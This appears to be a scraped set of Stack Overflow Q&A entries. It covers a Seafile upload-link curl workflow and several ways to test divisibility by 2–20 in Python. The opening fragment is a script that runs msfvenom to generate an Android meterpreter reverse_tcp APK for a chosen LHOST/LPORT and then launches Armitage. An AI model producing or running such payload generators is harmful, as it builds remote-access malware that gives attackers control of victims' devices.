print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + str(lhost) + " LPORT=" + str(lport) + " R> /root/Desktop")
print("the apk is located in ur Desktop")
os.system("service postgresql start")
os.system("armitage")
elif user_response == str(2):
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
<p>Linux does not care about filename extensions but it is still a python script so you should use .py. The command for executing it is "python3 scriptname.py". Keep in mind that you have to set the permission to executable with "chmod 755 scriptname.py"</p>
| 2 | 2016-08-03T12:02:02Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
How to use a Seafile generated upload-link w/o authentication token from command line | 38,742,893 | <p>With Seafile one is able to create a public upload link (e.g. <code>https://cloud.seafile.com/u/d/98233edf89/</code>) to upload files via Browser w/o authentication.</p>
<p>Seafile webapi does not support any upload w/o authentication token.</p>
<p>How can I use such kind of link from command line with curl or from python script?</p>
| 0 | 2016-08-03T11:54:13Z | 38,743,242 | <p>needed 2 hours to find a solution with curl, it needs two steps:</p>
<ol>
<li>make a get-request to the public uplink url with the <code>repo-id</code> as query parameter as follows:</li>
</ol>
<p><code>curl 'https://cloud.seafile.com/ajax/u/d/98233edf89/upload/?r=f3e30b25-aad7-4e92-b6fd-4665760dd6f5' -H 'Accept: application/json' -H 'X-Requested-With: XMLHttpRequest'</code></p>
<p>The response (JSON) contains the upload URL to use in the next POST, e.g.:</p>
<p><code>{"url": "https://cloud.seafile.com/seafhttp/upload-aj/c2b6d367-22e4-4819-a5fb-6a8f9d783680"}</code></p>
<ol start="2">
<li>Use this link to initiate the upload post:</li>
</ol>
<p><code>curl 'https://cloud.seafile.com/seafhttp/upload-aj/c2b6d367-22e4-4819-a5fb-6a8f9d783680' -F file=@./tmp/index.html -F filename=index.html -F parent_dir="/my-repo-dir/"</code></p>
<p>The response is JSON again, e.g.:</p>
<p><code>[{"name": "index.html", "id": "0a0742facf24226a2901d258a1c95e369210bcf3", "size": 10521}]</code></p>
<p>done ;)</p>
| 0 | 2016-08-03T12:08:15Z | [
"python",
"curl",
"urllib2",
"http-upload",
"seafile-server"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am a total newbie to programming and Python. I was solving a problem and found a solution, but it seems too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece of code that checks whether <code>n</code> is divisible by all numbers from 2 to 20.</p>
<p>How can I make it short and efficient?</p>
| 31 | 2016-08-03T11:56:13Z | 38,742,979 | <pre><code>if all(n % i == 0 for i in range(2, 21)):
</code></pre>
<p><code>all</code> accepts an iterable and returns <code>True</code> if all of its elements are evaluated to <code>True</code>, <code>False</code> otherwise. The <code>n % i == 0 for i in range(2, 21)</code> part returns an iterable with 19 <code>True</code> or <code>False</code> values, depending if <code>n</code> is dividable by the corresponding <code>i</code> value.</p>
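Wrapped into a function with a couple of sanity checks (232792560 is the smallest number divisible by everything from 2 through 20):

```python
def divisible_by_all(n, limit=20):
    return all(n % i == 0 for i in range(2, limit + 1))

print(divisible_by_all(232792560))   # True
print(divisible_by_all(40))          # False: 40 % 3 != 0
```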
| 46 | 2016-08-03T11:57:49Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am a total newbie to programming and Python. I was solving a problem and found a solution, but it seems too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,005 | <p>Built in <a href="https://docs.python.org/2/library/functions.html#all">all </a> will help.</p>
<blockquote>
<p>Return True if all elements of the iterable are true (or if the iterable is empty).</p>
</blockquote>
<pre><code>if all(n % i == 0 for i in xrange(2, 21))
</code></pre>
| 6 | 2016-08-03T11:58:47Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,106 | <p>There's a trade-off between short and efficient.</p>
<p>The <em>Short</em> way is <code>if all(n % i == 0 for i in range(2, 21)):</code></p>
<p>The <em>Efficient</em> way is to notice that things like <code>n % 20 == 0</code> also mean that <code>n % f == 0</code> where <code>f</code> is any factor of 20. For example, you can drop <code>n % 2 == 0</code>. So you'll end up with fewer comparisons which will run faster. In doing this you'll notice a pattern and you'll notice that the <em>entire</em> statement reduces to <code>if n % 232792560 == 0</code>! But that has now deeply embedded the 20 within it so will be difficult to unpick if you need a different upper limit.</p>
<p>So you see that the <em>efficient</em> way is not so easy to read and maintain. So pick the one best suited to your requirements.</p>
| 79 | 2016-08-03T12:02:46Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,183 | <p>You need a condition that evaluates True when all divisions give a zero remainder. The two solutions so far proposed don't appear to do that. I suspect the condition you need is</p>
<pre><code>if not any(n % i for i in range(2, 21)):
</code></pre>
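<p>This spelling is logically equivalent to the <code>all(... == 0 ...)</code> form: <code>not any(nonzero remainders)</code> holds exactly when every remainder is zero. A quick demonstration on a few sample values:</p>

```python
# The two predicates agree on divisible and non-divisible inputs alike.
for n in (232792560, 360, 97):
    a = all(n % i == 0 for i in range(2, 21))
    b = not any(n % i for i in range(2, 21))
    assert a == b
    print(n, a)
```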
| 3 | 2016-08-03T12:05:44Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,446 | <p>There's a smarter way to do this. If <code>n</code> is divisible by every integer in range(1, 21) then it <em>must</em> be a multiple of the <a href="https://en.wikipedia.org/wiki/Least_common_multiple">least common multiple</a> of those integers. </p>
<p>You can calculate the LCM of a set of numbers progressively, using the GCD (greatest common divisor). You can import the gcd function from the <code>fractions</code> module, or implement it directly in your code.</p>
<pre><code>def gcd(a, b):
''' Greatest Common Divisor '''
while b:
a, b = b, a % b
return a
def lcm(a, b):
''' Least Common Multiple '''
return a * b // gcd(a, b)
# Compute the LCM of range(1, 21)
n = 2
for i in range(3, 21):
n = lcm(n, i)
lcm20 = n
print('LCM =', lcm20)
#test
for i in range(1, 21):
print(i, lcm20 % i)
</code></pre>
<p><strong>output</strong></p>
<pre><code>LCM = 232792560
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 0
11 0
12 0
13 0
14 0
15 0
16 0
17 0
18 0
19 0
20 0
</code></pre>
<p>Now, to test if any number <code>n</code> is divisible by all the numbers is range(1, 21) you can just do </p>
<pre><code>n % lcm20 == 0
</code></pre>
<p>or hard-code the constant into your script:</p>
<pre><code># 232792560 is the LCM of 1..20
n % 232792560 == 0
</code></pre>
<hr>
<p>As Anton Sherwood points out in <a href="http://stackoverflow.com/questions/38742938/how-to-make-this-block-of-python-code-short-and-efficient/38743446#comment64890813_38743106">his comment</a> we can speed up the process of finding the required LCM by just taking the LCM of the upper half of the range. This works because each number in the lower half of the range is a divisor of a number in the upper half of the range.</p>
<p>We can improve the speed even further by in-lining the GCD and LCM calculations, rather than calling functions to perform those operations. Python function calls are noticeably slower than C function calls due to the extra overheads involved.</p>
<p>Yakk mentions an alternative approach to finding the required LCM: calculate the product of the prime powers in the range. This is quite fast if the range is large enough (around 40 or so), but for small numbers the simple LCM loop is faster.</p>
<p>Below is some <code>timeit</code> code that compares the speed of these various approaches. This script runs on Python 2 and 3, I've tested it on Python 2.6 and Python 3.6. It uses a prime list function by Robert William Hanks to implement Yakk's suggestion. I've modified Robert's code slightly to make it compatible with Python 3. I suppose there may be a more efficient way to find the prime powers; if so, I'd like to see it. :)</p>
<p>I mentioned earlier that there's a GCD function in the <code>fractions</code> module. I did some time tests with it, but it's noticeably slower than my code. Presumably that's because it does error checking on the arguments.</p>
<pre><code>#!/usr/bin/env python3
''' Least Common Multiple of the numbers in range(1, m)
Speed tests
Written by PM 2Ring 2016.08.04
'''
from __future__ import print_function
from timeit import Timer
#from fractions import gcd
def gcd(a, b):
''' Greatest Common Divisor '''
while b:
a, b = b, a % b
return a
def lcm(a, b):
''' Least Common Multiple '''
return a * b // gcd(a, b)
def primes(n):
''' Returns a list of primes < n '''
# By Robert William Hanks, from http://stackoverflow.com/a/3035188/4014959
sieve = [True] * (n//2)
for i in range(3, int(n ** 0.5) + 1, 2):
if sieve[i//2]:
sieve[i*i//2::i] = [False] * ((n - i*i - 1) // (2*i) + 1)
return [2] + [2*i + 1 for i in range(1, n//2) if sieve[i]]
def lcm_range_PM(m):
''' The LCM of range(1, m) '''
n = 1
for i in range(2, m):
n = lcm(n, i)
return n
def lcm_range_AS(m):
''' The LCM of range(1, m) '''
n = m // 2
for i in range(n + 1, m):
n = lcm(n, i)
return n
def lcm_range_fast(m):
''' The LCM of range(1, m) '''
n = m // 2
for i in range(n + 1, m):
a, b = n, i
while b:
a, b = b, a % b
n = n * i // a
return n
def lcm_range_primes(m):
n = 1
for p in primes(m):
a = p
while a < m:
a *= p
n *= a // p
return n
funcs = (
lcm_range_PM,
lcm_range_AS,
lcm_range_fast,
lcm_range_primes
)
def verify(hi):
''' Verify that all the functions give the same result '''
for i in range(2, hi + 1):
a = [func(i) for func in funcs]
a0 = a[0]
assert all(u == a0 for u in a[1:]), (i, a)
print('ok')
def time_test(loops, reps):
''' Print timing stats for all the functions '''
timings = []
for func in funcs:
fname = func.__name__
setup = 'from __main__ import num, ' + fname
cmd = fname + '(num)'
t = Timer(cmd, setup)
result = t.repeat(reps, loops)
result.sort()
timings.append((result, fname))
timings.sort()
for result, fname in timings:
print('{0:16} {1}'.format(fname, result))
verify(500)
reps = 3
loops = 8192
num = 2
for _ in range(10):
print('\nnum = {0}, loops = {1}'.format(num, loops))
time_test(loops, reps)
num *= 2
loops //= 2
print('\n' + '- ' * 40)
funcs = (
lcm_range_fast,
lcm_range_primes
)
loops = 1000
for num in range(30, 60):
print('\nnum = {0}, loops = {1}'.format(num, loops))
time_test(loops, reps)
</code></pre>
<p><strong>output</strong></p>
<pre><code>ok
num = 2, loops = 8192
lcm_range_PM [0.013914467999711633, 0.01393848999941838, 0.023966414999449626]
lcm_range_fast [0.01656803699916054, 0.016577592001340236, 0.016578077998929075]
lcm_range_AS [0.01738608899904648, 0.017602848000024096, 0.01770572900022671]
lcm_range_primes [0.0979132459997345, 0.09863009199943917, 0.10133290699923236]
num = 4, loops = 4096
lcm_range_fast [0.01580070299860381, 0.01581421999981103, 0.016406731001552544]
lcm_range_AS [0.020135083001150633, 0.021132826999746612, 0.021589830999801052]
lcm_range_PM [0.02821666900126729, 0.029041511999821523, 0.036708851001094445]
lcm_range_primes [0.06287289499960025, 0.06381634699937422, 0.06406087200048205]
num = 8, loops = 2048
lcm_range_fast [0.015360695999333984, 0.02138442599971313, 0.02630166100061615]
lcm_range_AS [0.02104746699842508, 0.021742354998423252, 0.022648989999652258]
lcm_range_PM [0.03499621999981173, 0.03546843599906424, 0.042924503999529406]
lcm_range_primes [0.03741390599861916, 0.03865244000007806, 0.03959638999913295]
num = 16, loops = 1024
lcm_range_fast [0.015973221999956877, 0.01600381199932599, 0.01603960700049356]
lcm_range_AS [0.023003745000096387, 0.023848425998949097, 0.024875303000953863]
lcm_range_primes [0.028887982000014745, 0.029422679001072538, 0.029940758000520873]
lcm_range_PM [0.03780223299872887, 0.03925949299991771, 0.04462484900068375]
num = 32, loops = 512
lcm_range_fast [0.018606906000059098, 0.02557359899947187, 0.03725786200084258]
lcm_range_primes [0.021675119000065024, 0.022790905999499955, 0.03934840099827852]
lcm_range_AS [0.025330593998660333, 0.02545427500081132, 0.026093265998497372]
lcm_range_PM [0.044320442000753246, 0.044836185001258855, 0.05193238799984101]
num = 64, loops = 256
lcm_range_primes [0.01650579099987226, 0.02443148000020301, 0.033489004999864846]
lcm_range_fast [0.018367127000601613, 0.019002625000211992, 0.01955779200034158]
lcm_range_AS [0.026258470001266687, 0.04113643799973943, 0.0436801750001905]
lcm_range_PM [0.04854909000096086, 0.054864030998942326, 0.0797669980001956]
num = 128, loops = 128
lcm_range_primes [0.013294352000229992, 0.013383581999732996, 0.024317635999977938]
lcm_range_fast [0.02098568399924261, 0.02108044199849246, 0.03272008299973095]
lcm_range_AS [0.028861763999884715, 0.0399744570004259, 0.04660961700028565]
lcm_range_PM [0.05302166500041494, 0.059346372001527925, 0.07757829000001948]
num = 256, loops = 64
lcm_range_primes [0.010487794999789912, 0.010514846000660327, 0.01055656300013652]
lcm_range_fast [0.02619308099929185, 0.02637610199963092, 0.03755473099954543]
lcm_range_AS [0.03422451699952944, 0.03513622399987071, 0.05206341099983547]
lcm_range_PM [0.06851765200008231, 0.073690847000762, 0.07841700100107118]
num = 512, loops = 32
lcm_range_primes [0.009275872000216623, 0.009292663999076467, 0.009309271999882185]
lcm_range_fast [0.03759837500001595, 0.03774761099884927, 0.0383951439998782]
lcm_range_AS [0.04527828100071929, 0.046646228000099654, 0.0569303670017689]
lcm_range_PM [0.11064135100059502, 0.12738902800083451, 0.13843623499997193]
num = 1024, loops = 16
lcm_range_primes [0.009248070000467123, 0.00931658900117327, 0.010279963000357384]
lcm_range_fast [0.05642254200029129, 0.05663530499987246, 0.05796714499956579]
lcm_range_AS [0.06509247900066839, 0.0652738099997805, 0.0658949799999391]
lcm_range_PM [0.11376448099872505, 0.11652833600055601, 0.12083648199950403]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
num = 30, loops = 1000
lcm_range_fast [0.03275446999941778, 0.033530079999763984, 0.04002811799909978]
lcm_range_primes [0.04062690899991139, 0.040886697999667376, 0.04130547800014028]
num = 31, loops = 1000
lcm_range_fast [0.03423191600086284, 0.039976395999474335, 0.04078094900069118]
lcm_range_primes [0.04053011599899037, 0.04140578700025799, 0.04566663300101936]
num = 32, loops = 1000
lcm_range_fast [0.036124262000157614, 0.036700047998238006, 0.04392546200142533]
lcm_range_primes [0.042666604998885305, 0.04393434200028423, 0.05142524700022477]
num = 33, loops = 1000
lcm_range_fast [0.03875456000059785, 0.03997290300139866, 0.044469664000644116]
lcm_range_primes [0.04280027899949346, 0.0437891679994209, 0.04381238600035431]
num = 34, loops = 1000
lcm_range_fast [0.038203157999305404, 0.03937257799952931, 0.04531203700025799]
lcm_range_primes [0.043273317998682614, 0.043349457999283914, 0.04420187600044301]
num = 35, loops = 1000
lcm_range_fast [0.04228670399970724, 0.04346491300020716, 0.047442203998798504]
lcm_range_primes [0.04332462999991549, 0.0433610400014004, 0.04525857199951133]
num = 36, loops = 1000
lcm_range_fast [0.04175829099949624, 0.04217126499861479, 0.046840714998324984]
lcm_range_primes [0.04339772299863398, 0.04360795700085873, 0.04453475599984813]
num = 37, loops = 1000
lcm_range_fast [0.04231068799890636, 0.04373836499871686, 0.05010528200000408]
lcm_range_primes [0.04371378700125206, 0.04463105400100176, 0.04481986299833807]
num = 38, loops = 1000
lcm_range_fast [0.042841554000915494, 0.043649038998410106, 0.04868016199907288]
lcm_range_primes [0.04571479200058093, 0.04654245399979118, 0.04671720700025617]
num = 39, loops = 1000
lcm_range_fast [0.04469198100014182, 0.04786454099848925, 0.05639159299971652]
lcm_range_primes [0.04572433999965142, 0.04583652600013011, 0.046649005000290344]
num = 40, loops = 1000
lcm_range_fast [0.044788433999201516, 0.046223339000789565, 0.05302252199908253]
lcm_range_primes [0.045482261000870494, 0.04680115900009696, 0.046941823999077315]
num = 41, loops = 1000
lcm_range_fast [0.04650144500010356, 0.04783133000091766, 0.05405569400136301]
lcm_range_primes [0.04678159699869866, 0.046870936999766855, 0.04726529199979268]
num = 42, loops = 1000
lcm_range_fast [0.04772527699969942, 0.04824955299955036, 0.05483534199993301]
lcm_range_primes [0.0478546140002436, 0.048954233001495595, 0.04905354400034412]
num = 43, loops = 1000
lcm_range_primes [0.047872637000182294, 0.048093739000250935, 0.048502418998396024]
lcm_range_fast [0.04906317900167778, 0.05292572700091114, 0.09274570399975346]
num = 44, loops = 1000
lcm_range_primes [0.049750300000596326, 0.050272532000235515, 0.05087747600009607]
lcm_range_fast [0.050906279000628274, 0.05109869400075695, 0.05820328499976313]
num = 45, loops = 1000
lcm_range_primes [0.050158660000306554, 0.050309066000409075, 0.054478109999763547]
lcm_range_fast [0.05236714599959669, 0.0539534259987704, 0.058996140000090236]
num = 46, loops = 1000
lcm_range_primes [0.049894845999006066, 0.0512076260001777, 0.051318084999365965]
lcm_range_fast [0.05081920200063905, 0.051397655999608105, 0.05722950699964713]
num = 47, loops = 1000
lcm_range_primes [0.04971165599999949, 0.05024208400027419, 0.051092388999677496]
lcm_range_fast [0.05388393700013694, 0.05502788499870803, 0.05994341699988581]
num = 48, loops = 1000
lcm_range_primes [0.0517014939996443, 0.05279760400117084, 0.052917389999493025]
lcm_range_fast [0.05402479099939228, 0.055251746000067214, 0.06128628700025729]
num = 49, loops = 1000
lcm_range_primes [0.05412415899991174, 0.05474224499994307, 0.05610057699959725]
lcm_range_fast [0.05757830900074623, 0.0590323519991216, 0.06310263200066402]
num = 50, loops = 1000
lcm_range_primes [0.054892387001018506, 0.05504404100065585, 0.05610281799999939]
lcm_range_fast [0.0588886920013465, 0.0594741389995761, 0.06682244199873821]
num = 51, loops = 1000
lcm_range_primes [0.05582956999933231, 0.055921465000210446, 0.06004790299994056]
lcm_range_fast [0.060586288000195054, 0.061715600999377784, 0.06733965300009004]
num = 52, loops = 1000
lcm_range_primes [0.0557458109997242, 0.05669860099988, 0.056761407999147195]
lcm_range_fast [0.060323355999571504, 0.06177857100010442, 0.06778404599936039]
num = 53, loops = 1000
lcm_range_primes [0.05501838899908762, 0.05541463699955784, 0.0561610999993718]
lcm_range_fast [0.06281833000139159, 0.06334177999997337, 0.06843207200108736]
num = 54, loops = 1000
lcm_range_primes [0.057314272000439814, 0.059501444000488846, 0.060004871998899034]
lcm_range_fast [0.06634221600143064, 0.06662889200015343, 0.07153233899953193]
num = 55, loops = 1000
lcm_range_primes [0.05790564500057371, 0.05824322199987364, 0.05863306900027965]
lcm_range_fast [0.06693624800027465, 0.06784769100158883, 0.07562533499913116]
num = 56, loops = 1000
lcm_range_primes [0.057219010001063, 0.05858367799919506, 0.06246676000046136]
lcm_range_fast [0.06854197999928147, 0.06999059400004626, 0.07505119899906276]
num = 57, loops = 1000
lcm_range_primes [0.05746709300001385, 0.0587476679993415, 0.0606189070003893]
lcm_range_fast [0.07094627400147147, 0.07241532700027165, 0.07868066799892404]
num = 58, loops = 1000
lcm_range_primes [0.0576490580006066, 0.058481812999161775, 0.05857339500107628]
lcm_range_fast [0.07127979200049595, 0.07549924399972952, 0.07849203499972646]
num = 59, loops = 1000
lcm_range_primes [0.057503377998727956, 0.058632499998566345, 0.060360438999850885]
lcm_range_fast [0.07332589399993594, 0.07625177999943844, 0.08087236799838138]
</code></pre>
<p>This timing info was generated using Python 3.6 running on a Debian derivative of Linux, on an ancient 2GHz Pentium IV machine.</p>
| 53 | 2016-08-03T12:17:35Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,465 | <p>It's just a mathematical trick,
use something like <code>n % LCM(1,2,...,20) == 0</code> which could be coded as:</p>
<pre><code>if n % 232792560 == 0:
#do whatever you want
</code></pre>
| 4 | 2016-08-03T12:18:35Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,751,082 | <p>For variety, the way you could have used a loop for this is</p>
<pre><code>test = True
for modulus in range(2, 21):
if n % modulus != 0:
test = False
break
if test:
# Do stuff
</code></pre>
<p>If you are comfortable with <code>for</code>-<code>else</code>, you can improve the brevity by</p>
<pre><code>for modulus in range(2, 21):
if n % modulus != 0:
break
else:
# Do stuff
</code></pre>
<p>although that pattern may be unusual enough that you wouldn't want to use it.</p>
<p>Another option is to write a helper function</p>
<pre><code>def is_divisible_by_integers_up_to(n, bound):
for modulus in range(2, bound + 1):
if n % modulus != 0:
return False
return True
if is_divisible_by_integers_up_to(n, 20):
# Do stuff
</code></pre>
<p>However, this particular example is simple enough that doing <code>all</code> with a generator expression as described in the other answers is the best way to go.</p>
| 4 | 2016-08-03T18:26:05Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,751,170 | <p>I'm a very light python user myself, and I didn't know about all. Those solutions are pretty cool (and probably more efficient than the one I'm about to post). But just if you want to see another way to do it, here is another option:</p>
<pre><code>def IsDivUpTo20(n):
for i in range(2, 21):
if n % i != 0:
return False
return True
</code></pre>
<p>And call it like so</p>
<pre><code>if IsDivUpTo20(50):
#what to do if it is divisible
else:
#what to do if it isn't
#for the example of 50, it'll be false and jump to the else part, but you can put any number of variable in there
</code></pre>
<p>Functionally it is working pretty much the same way 'all' is, but if you aren't used to the fancy syntax and built-ins this one is a bit more intuitive.</p>
<p>*Note: I use Python 3, not Python 2.7 as the question is tagged. I'm pretty sure this works in that version but if not, someone please correct me.</p>
| 2 | 2016-08-03T18:31:15Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,753,310 | <p>Similar to previous answers:</p>
<pre><code>import operator
x = 232792560
if reduce(operator.__and__, [x % n == 0 for n in xrange(2, 21, 2)]):
print("ok")
</code></pre>
| 2 | 2016-08-03T20:46:25Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,759,211 | <p>Many of the above code examples are shorter, but (probably) not efficient enough:</p>
<pre><code>n % 4  == 0  =>  n % 2 == 0
n % 9  == 0  =>  n % 3 == 0
n % 16 == 0  =>  n % 8 == 0 and n % 4 == 0
</code></pre>
<p>We only need to check the largest prime powers within the range:</p>
<pre><code>if all(n % i == 0 for i in [16, 9, 5, 7, 11, 13, 17, 19])
</code></pre>
<p>Furthermore, if n divides all from 2 to 20, it divides the LCM of 2 to 20.</p>
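<p>Bare primes alone would not be enough here: a number can be divisible by 2 and 3 without being divisible by 16 or 9. The minimal set is the largest prime <em>powers</em> not exceeding 20, which can be verified with a quick check (the counterexample <code>n</code> below is just the product of the primes up to 20):</p>

```python
# Largest prime powers <= 20: 16 = 2**4, 9 = 3**2, then 5, 7, 11, 13, 17, 19.
# Bare primes are a weaker test than the full range; prime powers match it.
powers = [16, 9, 5, 7, 11, 13, 17, 19]
primes = [2, 3, 5, 7, 11, 13, 17, 19]
n = 2 * 3 * 5 * 7 * 11 * 13 * 17 * 19           # 9699690
print(all(n % p == 0 for p in primes))          # True  -- primes check passes
print(all(n % i == 0 for i in range(2, 21)))    # False -- but 4 does not divide n
print(all(n % p == 0 for p in powers))          # False -- prime powers catch it
```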
| 3 | 2016-08-04T05:38:12Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
